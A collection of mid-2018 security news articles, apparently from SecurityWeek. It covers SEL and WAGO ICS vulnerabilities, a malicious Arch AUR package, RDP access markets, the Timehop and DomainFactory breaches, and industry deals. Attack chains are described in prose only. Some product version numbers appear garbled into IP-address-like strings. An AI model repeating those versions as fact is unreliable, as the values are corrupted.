Radiflow is one of several cybersecurity startups targeting the industrial space that have raised funding. Some others include Dragos, Indegy, Bayshore Networks, CyberX, SCADAfence and Nozomi Networks. Veteran industrial software firm PAS raised $40 million in April 2017. Darktrace, which has an offering targeted to the industrial sector, raised $75 million at a valuation of $825 million in July 2017. Just last month, New York-based Claroty announced that it had raised $60 million in a Series B funding round, bringing the total amount raised by the company to date to $93 million.
Power Grid Protection Firm SEL Patches Severe Software Flaws
18.7.2018 securityweek ICS
Several vulnerabilities, including ones rated high severity, have been discovered in management and configuration tools from power grid protection company Schweitzer Engineering Laboratories (SEL). The vendor has released software updates to address the flaws.
The security holes were discovered by Gjoko Krstic, a researcher with industrial cybersecurity firm Applied Risk. The flaws affect SEL Compass, a tool designed for managing SEL products, and AcSELerator Architect, an app that streamlines the configuration and documentation of IEC 61850 control and SCADA communications.
According to advisories published by Applied Risk and ICS-CERT, AcSELerator Architect 18.104.22.168 and prior versions are affected by two vulnerabilities. One of them, a high severity XML External Entity (XXE) vulnerability, can lead to information disclosure and in some cases to arbitrary code execution or a denial-of-service (DoS) condition. The flaw, tracked as CVE-2018-10600, can be exploited by getting the targeted user to open a specially crafted template or project file.Vulnerabilities found in SEL products
“The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML project and/or template file (.selaprj). This attack can also be used to execute arbitrary code (in certain circumstances, depending on the platform) or cause a denial of service (DoS) condition (billion laughs) via a specially crafted XML file including multiple external entity references,” Applied Risk wrote in its advisory.
The second flaw affecting AcSELerator Architect, identified as CVE-2018-10608, is a medium severity DoS issue that can be triggered using a malicious FTP server.
“The vulnerability can be triggered when an attacker provides the victim with a rogue malicious FTP server and listens for connections from the AcSELerator Architect FTP client feature. Once the victim gets connected to the evil FTP via the TCP protocol, a 100% CPU exhaustion occurs rendering the software to hang (not responding), denying legitimate workflow to the victim until the application is forcibly restarted,” Applied Risk explained.
As for SEL Compass, the application is affected by a high severity insecure file permissions issue that can be exploited for privilege escalation. This bug is tracked as CVE-2018-10604.
“The vulnerability exists due to the improper permissions on the SEL Compass directory, with the 'F' flag (Full) for 'Everyone' group. This gives an authenticated attacker the ability to modify or overwrite any file in the Compass directory with malicious code (trojan or a rootkit). This could result in escalation of privileges or malicious effects on the system the next time that a privileged user runs Compass,” Applied Risk said in a different advisory.
SEL patched the vulnerabilities with the release of SEL Compass v22.214.171.124 and SEL AcSELerator v126.96.36.199. Applied Risk told SecurityWeek that it took the vendor more than three months to release the updates.
SEL recently teamed up with industrial cybersecurity firm Dragos to “arm the electric power community with the tools to better detect and respond to threats within their industrial control system (ICS) networks.”
Outdated DoD IT Jeopardizes National Security: Report
18.7.2018 securityweek BigBrothers
Failure to Modernize Legacy DoD Systems is Putting U.S. National Security in Jeopardy, Report Claims
In a new study titled 'Innovation Imperative: The Drive to Modernize DoD', Meritalk queried 150 federal IT managers working in Department of Defense (DoD) organizations. The stated objective was "to understand the state of their IT infrastructure and applications." This was to include levels of satisfaction, an indication of where missions are being met or missed, and what should be done next.
In fact, this report is solely about DoD IT managers' attitude towards cloud migration -- which is perhaps unsurprising since the survey was underwritten by AWS and Red Hat.
The results confirm a strong belief that cloud is the way forward -- and perhaps the only way for the U.S. military to maintain an advantage over the world's other super powers: China and increasingly Russia. For example, 80% of the respondents say the DoD needs to improve the use of cloud to maintain the military’s technical advantage and support mission success; and 81% say accelerating DoD’s adoption of cloud is critical.
86% of respondents said that failing to modernize legacy DoD systems is putting U.S. national security in jeopardy.
The increasing use of artificial intelligence and big data analytics by the military, the need for more efficient data sharing between agencies, and the power to transcribe and translate massive amounts of recorded voice in almost real time can only be served by the power and flexibility of the cloud.
PentagonRespondents to the survey specifically see DoD cloud adoption important for big data analytics (85%), electronic warfare (83%), shared services (82%), DevOps (81%), AI (77%), IoT (73%), machine learning (72%) and blockchain (61%). But this understanding is not new to the DoD.
The Joint Enterprise Defense Infrastructure (JEDI) initiative is a plan for the DoD to acquire its own commercial cloud infrastructure suitable to hold DoD data at all classification levels, and available to any organization in DoD. It is a massive project spread over a ten-year ordering period, and thought to have a budget of around $10 billion over that timeframe.
It is believed that the DoD's preference is to award the project to a single provider; and it is equally believed that AWS is the frontrunner. Smaller existing cloud providers would lose out, and have been lobbying for a multi-provider approach. Microsoft, Google and IBM are also rumored to be interested in bidding for the project.
There is little mention of JEDI within the Meritalk survey. However, 51% of the respondents said they believe that a single-vendor cloud solution has more pros than cons. Sixty-three percent said that talk about JEDI has had "a positive impact on the pace of their organization’s IT modernization efforts"; and "72% feel utilizing multiple cloud vendors would increase the complexity of their organization’s system integrations."
The Meritalk survey, underwritten by AWS and Red Hat, offers strong support for the DoD's single supplier JEDI preference, where AWS (most probably backed by Red Hat software) is the frontrunner.
But regardless of who wins the JEDI provider contract, the survey also demonstrates that DoD IT managers are ready to increase their migration to the cloud. More than 50% of the respondents would recommend moving 50% of their current data to the cloud (13% would move 'the vast majority' of their data). They are unlikely -- and in some cases for reasons of national security unable -- to adopt a cloud-only strategy.
This will set the DoD on a path directly parallel to that faced by commercial enterprises today -- to what extent should existing infrastructures and data be migrated to the cloud, how can it be achieved, and how do you secure it. The only primary difference is that DoD already knows which cloud; that is, the JEDI cloud.
"The survey shows that the interest and promise of the cloud is well recognized, but the DoD would benefit from the lessons being learned right now by large private enterprises going through the same processes," Ken Spinner, VP of field engineering at Varonis told SecurityWeek. "Private industry, which is often recognized for its agility and embrace of new technologies, still largely works with a hybrid mix of cloud and on-premises systems and storage."
"One thing is certain," agrees Rick Moy, head of marketing at Acalvio: "hybrid networks, or cloud and on-premises." Both agree that adoption of JEDI -- or any other cloud solution -- will present the DoD organizations with both challenges and opportunities.
"There’s no easy button and the cloud is not without risks," says Spinner. "Another concern, and perhaps the weakest link, are the defense contractors that access confidential intelligence as part of their daily workload. It’s far too tempting for a few bad actors to breach a system and attempt to steal data -- the cloud needs to be protected just like on-premises systems and data. Another challenge will be to ensure that the security capabilities people currently have with on-prem solutions are available and tested with both pure cloud solutions and hybrid solutions."
But Moy adds the possibility of 'starting over'. "“I would argue that a move to cloud represents a fresh opportunity to build in better security and advanced monitoring capabilities," he told SecurityWeek: "ones that we may have overlooked in on-premises deployments. For instance, unified policy, access controls, deception, logging and monitoring, and so on."
The JEDI project shows that the DoD hierarchy is already set on a cloud future; and the Meritalk survey shows that individual DoD IT managers are ready for the challenge. "As DoD knows," concludes the Meritalk report, "cloud isn’t the final destination -- but it sets the foundation for necessary innovation, collaboration, and next-generation technologies like big data analytics, shared services, AI, and electronic warfare. Agencies must keep their eyes on the future and consider cloud in terms of broader IT modernization efforts government-wide."
AT&T to Acquire Threat Management Firm AlienVault
18.7.2018 securityweek IT
AT&T on Tuesday said it would acquire San Mateo, Calif.-based threat management and intelligence firm AlienVault for an undisclosed sum.
AlienVault offers its Unified Security Management platform and Open Threat Exchangeintelligence community, which will be integrated into AT&T’s cybersecurity suite of services.
Both companies have approved the agreement but the terms of the deal haven’t been disclosed. The acquisition, which is subject to customary closing conditions, is expected to complete in the third quarter of 2018.
AlienVault had raised more than $118 million in funding prior to agreeing to be acquired by the telecom giant.
With the acquisition of AlienVault, AT&T aims at expanding its portfolio of enterprise-focused security solutions to target small and medium-sized businesses.
“Regardless of size or industry, businesses today need cyber threat detection and response technologies and services. The current threat landscape has shifted this from a luxury for some, to a requirement for all,” Thaddeus Arroyo, CEO, AT&T Business, commented.
After the transaction is completed, AT&T will provide business customers with a unified security management platform that aims at helping organizations detect and respond to threats more effectively. According to AT&T, AlienVault will become a key part of its Edge-to-Edge Intelligence capabilities.
Although the two companies did not provide details on the transaction, AT&T did say the deal is not “expected to have a material effect on AT&T’s results.”
Hacker Offers Access to Machine at International Airport for $10
18.7.2018 securityweek Hacking
The cost of RDP (Remote Desktop Protocol) access to a system located at a major international airport is only $10 on the Dark Web, McAfee has discovered.
RDP, a proprietary Microsoft protocol that provides access to remote machines through a graphical interface, was designed for administration purposes, but cybercriminals are increasingly using it as part of their arsenal of attack tools.
In fact, numerous malware families have adopted RDP over the past several years, which resulted in the technique becoming more popular than email for ransomware distribution.
SamSam, the ransomware behind multiple attacks against healthcare organizations, has adopted the technique as well. SamSam was the malware used to infect customer-facing applications and some internal services at the City of Atlanta (recovery would cost the city over $10 million).
As McAfee has discovered, it’s actually incredibly easy for cybercriminals to gain RDP access to high-value networks: they only need to access an underground market and spend an initial $10 or less, or conduct their own scans for accessible systems.
The researchers looked into several RDP shops, offering between 15 to more than 40,000 RDP connections for sale. The largest of these shops is the Ultimate Anonymity Service (UAS), a Russian business, followed by Blackpass, Flyded, and xDedic (which was first analyzed in June 2016).
On these marketplaces, cybercriminals sell RDP access to a broad range of systems, ranging from Windows XP to Windows 10, with Windows 2008 and 2012 Server being the most popular (at around 11,000 and 6,500, respectively). Prices range from $3 (for a simple configuration) to $19 (for a high-bandwidth system with admin rights).
Access to systems running Windows Embedded Standard (or Windows IOT) is also available, including hundreds of similar configurations associated with municipalities, housing associations, and healthcare institutions in the Netherlands. Multiple government systems worldwide were also being sold.
On the UAS Shop, the researchers also found a newly added Windows Server 2008 R2 Standard machine available at only $10, and they eventually discovered it was located in a major International airport in the United States.
The investigation also revealed that the system had three user accounts available, one being an administrator account, while the other two were associated with a company specializing in airport security and building automation and with another specializing in camera surveillance and video analytics for airports.
“We did not explore the full level of access of these accounts, but a compromise could offer a great foothold and lateral movement through the network using tools such as Mimikatz,” McAfee points out.
An account found on another system led the researchers to a domain that appears to be related to “the airport’s automated transit system, the passenger transport system that connects terminals.” This system too was accessible from the Internet.
“Now we know that attackers, like the SamSam group, can indeed use an RDP shop to gain access to a potential high-value ransomware victim. We found that access to a system associated with a major international airport can be bought for only $10—with no zero-day exploit, elaborate phishing campaign, or watering hole attack,” the researchers underline.
While remote access to systems might be essential for administrators, it can also become a liability if not properly secured. Furthermore, with RPD shops stockpiling addresses of vulnerable machines, cybercriminals do not need to put a lot of effort into selecting victims: they only need to make a simple online purchase.
“In addition to selling RDP, some of these shops offer a lively trade in social security numbers, credit card data, and logins to online shops. […] BlackPass offered the widest variety of products. The most prolific of these brokers provide one-stop access to all the tools used to commit fraud: RDP access into computers, social security numbers and other integral data to set up loans or open bank accounts,” McAfee said.
Hackers Can Chain Multiple Flaws to Attack WAGO HMI Devices
18.7.2018 securityweek Vulnerebility
Germany-based industrial automation company WAGO has patched several vulnerabilities in its e!DISPLAY 7300T Web Panel human-machine interface (HMI) products that can be chained to take control of affected devices.
The security holes, discovered by researchers at security consultancy SEC Consult and rated “high severity,” include multiple reflected and one stored cross-site scripting (XSS) vulnerabilities (CVE-2018-12981), unrestricted file upload and file path manipulation issues (CVE-2018-12980), and an incorrect default permissions flaw (CVE-2018-12979).
The reflected XSS flaws allow an unauthenticated attacker to execute arbitrary scripts in the context of the victim and hijack their session by getting them to click on a specially crafted link. The stored XSS can only be exploited by an authenticated hacker, but it does not require the targeted user to click on a link. Instead, the malicious code is triggered when the victim visits the “PLC List” page in the web interface.WAGO HMI vulnerabilities
The unrestricted file upload vulnerability allows an attacker to upload arbitrary files, but not directly to the root as the web service does not run as a privileged user. On the other hand, the incorrect default permissions weakness does allow a file in the web root, specifically index.html, to be overwritten by the unprivileged “www” user.
Combining these flaws allows an attacker to upload a shell by overwriting index.html and execute arbitrary commands with the privileges of the “www” user.
“HMI displays are widely used in SCADA infrastructures. The link between their administrative (or informational) web interfaces and the users which access these interfaces is critical. The presented attacks demonstrate how simple it is to inject malicious code in order to break the security of this link by exploiting minimal user interaction,” SEC Consult explained. “As a consequence a computer which is used for HMI administration should not provide any possibility to get compromised via malicious script code.”
The vulnerabilities impact e!DISPLAY 7300T Web Panel models 762-3000, 762-3001, 762-3002 and 762-3003 running firmware version 01. The issues have been patched by the vendor with the release of firmware version 02.
In addition to installing the latest firmware, WAGO has advised customers to restrict network access to the device and avoid connecting it directly to the Internet, restrict the number of users who can access the system, change default passwords, and avoid clicking on links from untrusted sources.
Advisories describing these vulnerabilities have been published by SEC Consult, VDE@CERT, which coordinated the disclosure of the flaws, and WAGO.
This was not the first time SEC Consult identified vulnerabilities in WAGO products. Last year, the company reported finding a potentially serious vulnerability that could give a remote attacker access to an organization’s entire network.
Broadcom Buys Business Software Firm CA for $18.9 Billion
18.7.2018 securityweek IT
Semi-conductor giant Broadcom, which recently failed in a bid to buy US rival Qualcomm, on Wednesday announced a cash deal to buy software and services firm CA Technologies for $18.9 billion.
Broadcom described CA as a major provider of information technology management software, in an acquisition that would help the chip maker diversify its offerings.
"This transaction represents an important building block as we create one of the world's leading infrastructure technology companies," Broadcom chief executive Hock Tan said in a release.
The deal was approved by the boards of both companies.
Broadcom will pay $44.50 per share of CA stock; about 20 percent over the closing price for common shares at the end of formal market trading on Wednesday, according to the company.
"We are excited to have reached this definitive agreement with Broadcom," CA Technologies chief Mike Gregoire said in the joint release.
"This combination aligns our expertise in software with Broadcom's leadership in the semiconductor industry."
The companies expected the acquisition to close in the final quarter of this year. The merger must be approved by shareholders and regulators.
Broadcom in April transferred its headquarters from Singapore to the US as promised when it tried to buy Qualcomm.
The prior month, President Donald Trump issued an order barring the proposed $117 billion hostile takeover of Qualcomm, citing what he called "credible evidence" such a deal "threatens to impair the national security of the United States."
It would have been the biggest-ever deal in the tech sector.
Trump's order made no mention of China, but an earlier letter from the US Treasury Department warned that a takeover might hurt US leadership in 5G, super-fast fifth-generation wireless networks now being deployed, and consequently pose a threat to US security.
The presidential action was allowed because Broadcom is a foreign entity, but would not have been possible had it completed its move to Silicon Valley.
On March 14, Broadcom said it was withdrawing its offer for Qualcomm.
Broadcom was founded in California but moved its headquarters after a 2015 deal that merged it with Avago Technologies.
Timehop Shares More Details on Data Breach
18.7.2018 securityweek Incindent
Timehop has shared additional details about the recent data breach that impacted roughly 21 million user accounts, including what the attackers did once they gained access to the company’s systems and what other type of information was compromised.
Timehop provides an application that shows users the photos, videos and posts they shared on the current day in previous years on Facebook, Instagram, Twitter and other websites.
Earlier this month, the company revealed that one or more malicious hackers gained unauthorized access to a database storing usernames, phone numbers, email addresses, and social media access tokens for all users, which could have been leveraged to access a user’s posts on social networking websites.
In response to the incident, Timehop invalidated social media tokens to prevent abuse and instructed users to re-authenticate each service.
In an update posted on Wednesday, Timehop revealed that dates of birth, genders, and country codes were also compromised in the incident.
The investigation is ongoing, but so far the company believes the attacker gained access to 20.4 million names, 15.5 million dates of birth, 18.6 million email addresses, 9.2 million gender designations, and 4.9 million phone numbers. Timehop listed separately the number of impacted PII records covered by the recently introduced GDPR.
According to Timehop, the attacker first accessed its systems on December 19, 2017, after stealing an employee’s credentials for the company’s cloud computing environment. The unauthorized access came from an IP address in the Netherlands.
The hacker immediately started conducting reconnaissance, including scraping the list of roles and accounts, but the compromised environment had not stored any personal information.
Personal information was copied by Timehop to the compromised database in early April and the attacker only discovered it on June 22. On July 4, the hacker made a copy of the user database and then changed its password. These actions led to service disruptions and internal alerts being triggered, but it took nearly 24 hours for Timehop to determine that it had been breached after the first alert.
“[Timehop engineers] did not immediately suspect a security incident for two reasons that in retrospect are learning moments,” Timehop said. “First, because it was a holiday and no engineers were in the office, he considered it likely that another engineer had been doing maintenance and changed the password. Second, password anomalies of a similar nature had been observed in past outage. He made the decision that the event would be examined the next day, when engineers returned to the office.”
HackerOne Bug Bounty Programs Paid Out $11 Million in 2017
18.7.2018 securityweek Safety
White hat hackers who responsibly disclosed vulnerabilities through bug bounty programs hosted by HackerOne earned more than $11 million last year, according to the company’s 2018 Hacker-Powered Security Report.
HackerOne hosts roughly 1,000 programs that over the past years have received over 72,000 vulnerability reports from researchers in more than 100 countries. The bounties paid out since the launch of the company until June 2018 reached over $31 million.
Of the total, more than $25 million was paid out by organizations in the United States, which was also the country where the highest percentage of money went to ($5.3 million).
According to the company, 116 of the bug reports submitted last year resulted in payouts that exceeded $10,000, and the average amount paid out by companies for critical issues has increased to over $2,000, with organizations such as Microsoft and Intel offering as much as $250,000.
An increasing number of companies have launched public bug bounty programs, but still nearly 80% of programs were private last year. The majority of public programs are launched by organizations in the tech sector, which accounts for 63%.
The government sector recorded the biggest increase in new program launches, with the European Commission, and Singapore’s Ministry of Defense announcing initiatives. The U.S. government has also continued to run programs, including Hack the Air Force and Hack the Army.
Roughly 27,000 valid vulnerabilities were reported last year and cross-site scripting (XSS) remained the most common type of flaw, followed by information disclosure bugs.
When it comes to the time it takes organizations to patch security holes, the consumer goods industry was the fastest, with an average of 14 days. At the other end of the chart we have the government sector, which patched vulnerabilities, on average, in 68 days.
The highest bug bounty paid out last year was $75,000. A technology firm awarded the sum for three vulnerabilities that could have been chained for remote code execution without user interaction. Successful exploitation could have allowed an attacker to access credit card information, hijack user and employee accounts, access infrastructure code, or deploy mass ransomware campaigns.
The complete 2018 Hacker-Powered Security Report is available from HackerOne in PDF format.
Arch Linux AUR Repository Compromised
12.7.2018 securityweek Incindent
A user-maintained Arch Linux AUR (Arch User Repository) software repository was pulled earlier this week after it was found to contain malware.
The repository was apparently compromised by an actor using the handle “xeactor” after its original maintainer abandoned it. The affected repo was a user-maintained PDF viewer called acroread.
The orphaned package was modified on June 7, when xeactor added to it a curl script to fetch and execute a malicious script from an attacker-controlled server. The result was the installation of a persistent program that causes systemd to start periodically.
The executed scripts were also found to include a component to gather various data on the compromised machine, including ID, CPU details, Pacman (package management utility) Information, and the output of uname –a and systemctl list-units.
The modification was reported on July 8 and the commits were reverted within hours by maintainer Eli Schwartz, who also suspended the offending account and removed two other packages. The affected packages are acrored 9.5.5-8, balz 1.20-3, and minergate 8.1-2.
Some of those who analyzed the modified code suggested that the changes might have been intended as a warning, because the script would create files in such a way that generated a lot of noise. Specifically, a compromised.txt file was created in root and all home folders.
However, the scripts could have been modified at any time to execute arbitrary code, thus turning malicious.
As Arch's Giancarlo Razzolini points out, the issue itself isn’t that severe, despite the attention it has already gathered. All those who download from AUR do so at their own risk, and such incidents could happen more often than not, he suggests.
“I'm surprised that this type of silly package takeover and malware introduction doesn't happen more often. This is why we insist users always download the PKGBUILD from the AUR, inspect it and build it themselves. Helpers that do everything automatically and users that don't pay attention, *will* have issues. You should use helpers even more so at your risk than the AUR itself,” Razzolini notes.
Late last month, the developers of the Gentoo Linux distribution informed users that one of their GitHub accounts was compromised and that attackers planted malicious code. Gentoo’s infrastructure and repository mirrors weren’t affected.
As Facial Recognition Use Grows, So Do Privacy Fears
12.7.2018 securityweek Privacy
The unique features of your face can allow you to unlock your new iPhone, access your bank account or even "smile to pay" for some goods and services.
The same technology, using algorithms generated by a facial scan, can allow law enforcement to find a wanted person in a crowd or match the image of someone in police custody to a database of known offenders.
Facial recognition came into play last month when a suspect arrested for a shooting at a newsroom in Annapolis, Maryland, refused to cooperate with police and could not immediately be identified using fingerprints.
"We would have been much longer in identifying him and being able to push forward in the investigation without that system," said Anne Arundel County police chief Timothy Altomare.
Facial recognition is playing an increasing role in law enforcement, border security and other purposes in the US and around the world.
While most observers acknowledge the merits of some uses of this biometric identification, the technology evokes fears of a "Big Brother" surveillance state.
Heightening those concerns are studies showing facial recognition may not always be accurate, especially for people of color.
A 2016 Georgetown University study found that one in two American adults, or 117 million people, are in facial recognition databases with few rules on how these systems may be accessed.
A growing fear for civil liberties activists is that law enforcement will deploy facial recognition in "real time" through drones, body cameras and dash cams.
"The real concern is police on patrol identifying law-abiding Americans at will with body cameras," said Matthew Feeney, specialist in emerging technologies at the Cato Institute, a libertarian think tank.
"This technology is of course improving but it's not as accurate as science fiction films would make you think."
- 'Aggressive' deployments -
China is at the forefront of facial recognition, using the technology to fine traffic violators and "shame" jaywalkers, with at least one arrest of a criminal suspect.
Clare Garvie, lead author of the 2016 Georgetown study, said that in the past two years, "facial recognition has been deployed in a more widespread and aggressive manner" in the US, including for border security and at least one international airport.
News that Amazon had begun deploying its Rekognition software to police departments sparked a wave of protests from employees and activists calling on the tech giant to stay away from law enforcement applications.
Amazon is one of dozens of tech firms involved in facial recognition. Microsoft for example uses facial recognition for US border security, and the US state of Maryland uses technology from German-based Cognitec and Japanese tech firm NEC.
Amazon maintains that it does not conduct surveillance or provide any data to law enforcement, but simply enables them to match images to those in its databases.
The tech giant also claims its facial recognition system can help reunite lost or abducted children with their families and stem human trafficking.
- 'Slippery slope' -
Nonetheless, some say facial recognition should not be deployed by law enforcement because of the potential for errors and abuse.
That was an argument made by Brian Brackeen, founder and the chief executive officer of the facial recognition software developer Kairos.
"As the black chief executive of a software company developing facial recognition services, I have a personal connection to the technology, both culturally and socially," Brackeen said in a blog post on TechCrunch.
"Facial recognition-powered government surveillance is an extraordinary invasion of the privacy of all citizens -- and a slippery slope to losing control of our identities altogether."
The Georgetown study found facial recognition algorithms were five to 10 percent less accurate on African Americans than Caucasians.
- Policy questions -
Microsoft announced last month it had made significant improvements for facial recognition "across skin tones" and genders.
IBM meanwhile said it was launching a large-scale study "to improve the understanding of bias in facial analysis."
While more accurate facial recognition is generally welcomed, civil liberties groups say specific policy safeguards should be in place.
In 2015, several consumer groups dropped out of a government-private initiative to develop standards for facial recognition use, claiming the process was unlikely to develop sufficient privacy protections.
Cato's Feeney said a meaningful move would be to "purge these databases of anyone who isn't currently incarcerated or wanted for violent crime."
Jennifer Lynch, an attorney with the Electronic Frontier Foundation, said that the implications for police surveillance are significant.
"An inaccurate system will implicate people for crimes they did not commit. And it will shift the burden onto defendants to show they are not who the system says they are," Lynch said in a report earlier this year.
Lynch said there are unique risks of breach or misuse of this data, because "we can't change our faces."
Evan Selinger, a philosophy professor at the Rochester Institute of Technology, says facial recognition is too dangerous for law enforcement.
"It's an ideal tool for oppressive surveillance," Selinger said in a blog post.
"It poses such a severe threat in the hands of law enforcement that the problem cannot be contained by imposing procedural safeguards."
Apple Patches KRACK Flaws in Boot Camp
12.7.2018 securityweek Apple
Apple has released an update for its Boot Camp utility to address vulnerabilities related to the wireless Key Reinstallation Attacks (KRACK) that were disclosed late last year.
A total of 10 KRACK vulnerabilities were disclosed in October 2017, all impacting the Wi-Fi standard itself and rendering all Wi-Fi Protected Access II (WPA2) protocol implementations vulnerable. The new type of attack also impacts industrial networking devices.
An attacker looking to exploit the vulnerabilities would need manipulate replay handshake messages to trick the victim into reinstalling an already-in-use key. An attacker within Wi-Fi range of a victim would then have access to information previously assumed to be safely encrypted.
Vendors raced to patch the flaws, and Apple themselves released a fist set of KRACK-related patches in October last year, for iOS, macOS, tvOS, and watchOS devices. The company also addressed the bugs in Apple Watch and AirPort Base Station Firmware.
Apple is now pushing a fix for Boot Camp, the multi-boot utility included in macOS that allows users install Microsoft Windows operating systems on Intel-based Macs.
With the release of a Wi-Fi Update for Boot Camp 6.4.0 last week, the Cupertino-based tech giant is addressing a total of three KRACK-released flaws, which are tracked as CVE-2017-13077, CVE-2017-13078, and CVE-2017-13080.
By targeting vulnerable devices, an attacker in Wi-Fi range may force nonce reuse in WPA unicast/PTK clients or in WPA multicast/GTK clients, Apple explains in an advisory.
The software update, the company explains, is available for a broad range of machines running Boot Camp, including MacBook (Late 2009 and later), MacBook Pro (Mid 2010 and later), MacBook Air (Late 2010 and later), Mac mini (Mid 2010 and later), iMac (Late 2009 and later), and Mac Pro (Mid 2010 and later).
“A logic issue existed in the handling of state transitions. This was addressed with improved state management,” Apple noted.
Timehop Data Breach Hits 21 Million Users
12.7.2018 securityweek Incindent
Timehop informed users late last week that hackers gained unauthorized access to some of its systems as part of an attack that impacts roughly 21 million accounts.
New York-based Timehop has created an application that shows users the photos, videos and posts they shared on the current day in previous years on Facebook, Instagram, Twitter and other websites. The app also allows users to share these memories with their friends.
According to Timehop, the attacker accessed a database storing usernames, phone numbers, email addresses and social media access tokens. The incident affects approximately 21 million accounts, but only social media access tokens were exposed for all of them. Roughly 4.7 million accounts included phone numbers.
The compromised tokens can allow a malicious actor to access some of the targeted user’s social media posts, but they do not provide access to private messages. Moreover, Timehop has highlighted that there is no evidence of any unauthorized access using these tokens.
“In general, Timehop only has access to social media posts you post yourself to your profile. However, it is important that we tell you that there was a short time window during which it was theoretically possible for unauthorized users to access those posts - again, we have no evidence that this actually happened,” Timehop said.
The compromised tokens have been invalidated so users will have to re-authenticate each service with Timehop, a process that will generate new tokens.
The breach was discovered on July 4, but an investigation conducted by the company showed that the attack started as early as December 19, 2017, when hackers obtained admin credentials for cloud computing services used by Timehop.
“This unauthorized user created a new administrative user account, and began conducting reconnaissance activities within our Cloud Computing Environment. For the next two days, and on one day in March, 2018, and one day in June, 2018, the unauthorized user logged in again and continued to conduct reconnaissance,” the company explained.
The malicious activity was detected on July 4 after the attacker accessed a production database and started transferring data, which triggered an alarm.
Timehop says it took just over two hours to contain the incident after it was detected. The company has launched an investigation in collaboration with law enforcement, an incident response firm, and a threat intelligence company. Timehop has published both high-level and more technical reports on the incident.
The company has also retained the services of GDPR specialists to help it address the implications of the breach in Europe.
German Hosting Firm DomainFactory Hacked
12.7.2018 securityweek Hacking
DomainFactory, a Germany-based web hosting services provider of GoDaddy-owned Host Europe Group, informed customers late last week that their personal and financial information was exposed after a hacker gained access to some of its systems.
According to DomainFactory, one of the largest hosting firms in Germany, the breach occurred in late January, but the company only learned of the incident on July 3 after the hacker started disclosing samples of the stolen information on the DomainFactory forum.
The hack is still being investigated, but the attacker appears to have gained access to data such as customer name, company name, customer number, address, email address, phone number, DomainFactory phone password, date of birth, and bank name and account number.
The company says it has secured the point of entry used by the hacker, but has warned customers that the compromised information may be misused for financial fraud and other types of attacks.
Users have been instructed to change their passwords, including for their DomainFactory, DomainFactory phone, email, FTP, SSH and MySQL accounts.
According to German publication Heise, the hacker published a post on the DomainFactory forum on July 3 claiming to have gained access to one of the company’s customer databases. Both Heise and some of the impacted users have confirmed that the data appears to be legitimate.
The hacker has created the Twitter account “@NaHabedere” and claims to be from Austria. He told Heise that he breached DomainFactory in an effort to obtain information on a person who owes him money and decided to disclose the hack after the company failed to notify customers. The hacker apparently does not plan on selling or publishing the data he obtained.
DomainFactory has shut down its forum following the breach. Users have been advised to monitor their bank statements and report any suspicious activity to authorities.
UK Financial Authorities Publish Paper On Operational Resilience
12.7.2018 securityweek IT
UK Financial Authorities' Paper on Resilience Potentially Silos Continuity from Data Protection
The Bank of England (BofE), the UK's Prudential Regulation Authority (PRA), and the UK's Financial Conduct Authority (FCA) -- together known as the financial supervisory authorities -- have jointly published a discussion paper (PDF) on building operational resilience into the financial sector. While cyber is a major risk, the concept is to build resilience to all risks including cyber.
Regulated firms, financial market infrastructures (FMIs), consumers, industry bodies, auditors, specialist third-party providers, professional advisors and other regulators are invited to comment on the paper by 5 October 2018. The paper notes that there is currently no global framework for resilience, and says that the authorities "will share our insights with the global regulatory community."
While the paper does not differentiate between the types of risk to continuity, it nevertheless reflects a great deal of current thinking about cyber risk. It suggests that relevant companies should plan on the assumption that disruption will occur, as well as seeking to prevent it. Current cyber advice is that companies should assume they either are currently breached or will be breached in the future.
Consequently, the key to resilience is for the board to define "the level of disruption that could be tolerated" (CISOs call this the 'risk appetite'); and for the risk managers (CISOs for the cyber aspect) to put in place the means to confine any disruption within those bounds. This is the thinking behind cyber advice to concentrate on incident response.
The paper takes the view that concentrating on resilience is consistent with the Bank of England's Financial Policy Committee's (FPC) work on cyber risk. "The FPC identifies, monitors and takes action to remove or reduce systemic risks with a view to protecting and enhancing the resilience of the UK financial system. The FPC has been considering whether testing the financial system for disruption from cyber incidents is warranted for the purpose of enhancing and maintaining UK financial stability. While the FPC has been doing this in the context of cyber, the concepts are relevant to operational resilience regardless of the specific cause of disruption."
Indeed, the recommended process for evaluating and reducing the risk to resilience is similar to the recommended process for evaluating and reducing cyber risk.
But where the paper digresses from current cyber thinking is the view "that managing operational resilience is most effectively addressed by focusing on business services, rather than on systems and processes." It's a question of emphasis, and is similar in concept to the ongoing difficulties between operational technology and information technology. OT frequently prioritizes continuity over data protection. While few cyber experts believe that security can be obtained by technology alone, even fewer believe it can be obtained without it.
In the financial sector it is feasible that risk management might conclude that maintaining legacy systems is more important to operational continuity than the cyber risk to those same legacy systems; or that the introduction of new cyber security technologies might be operationally disruptive. Neil Costigan, CEO at BehavioSec, sees a danger here. "This is less about appropriate technology than practices and thinking," he told SecurityWeek. "It does, I guess, offer solid support for CISOs to lobby their boards about the threats and expectations; but I see it as recommendations/guidelines/advice for silos."
While current cyber thinking is that OT and IT need to merge, there is a danger that this emphasis on continuity and processes might maintain and even promote the separation. Costigan goes further, suggesting the UK might be missing an opportunity here. The paper discusses individual bank responsibility, where possibly sector resiliency is a shared responsibility.
"If you look at Sweden and Norway," he said, "you'll see that the banks do not operate in isolation -- security is viewed as a collective responsibility." He gives the example of BankID -- a single identity system that operates across multiple financial institutions, and has been recognized as a legally binding signature in other areas.
Dan Sloshberg, director product marketing at Mimecast, suggests that concentrating on resilience will automatically include cyber issues. "WannaCry was a wakeup call and highlighted the disruptive power and scale cyber-attacks can have on our critical national infrastructure," he says. "Organizations can also learn from the new NIS Directive. This legislation clearly signals the move away from pure protection-based cybersecurity thinking. Robust business continuity strategies have never been more important to ensure organizations can continue to operate during an attack and get back up on their feet quickly afterwards."
Dave Ginsburg, VP of marketing at Cavirin, sees the paper as a reasonable attempt to improve resiliency in a changing world. He notes that since the London bombing threat going back to the IRA and The Troubles last century in the UK, and 9/11 in the U.S., banks in both countries have effective disaster recovery operations in place.
"However," he told SecurityWeek, "financial interconnections and interdependencies are much more complicated than they were 17 years ago. What the UK is getting at is putting in place the mechanisms to preserve the financial ‘supply chain' if the worst occurs due to physical or cyberattack. Everyday approaches to physical security and user training don't necessarily address this, and one would hope that institutions in the US, if not implementing such an approach already, may use this as a template. And, it need not only apply to finance, but to the cyber posture of other critical systems such as telecommunications, transportation, electricity, and water supply, to name a few."
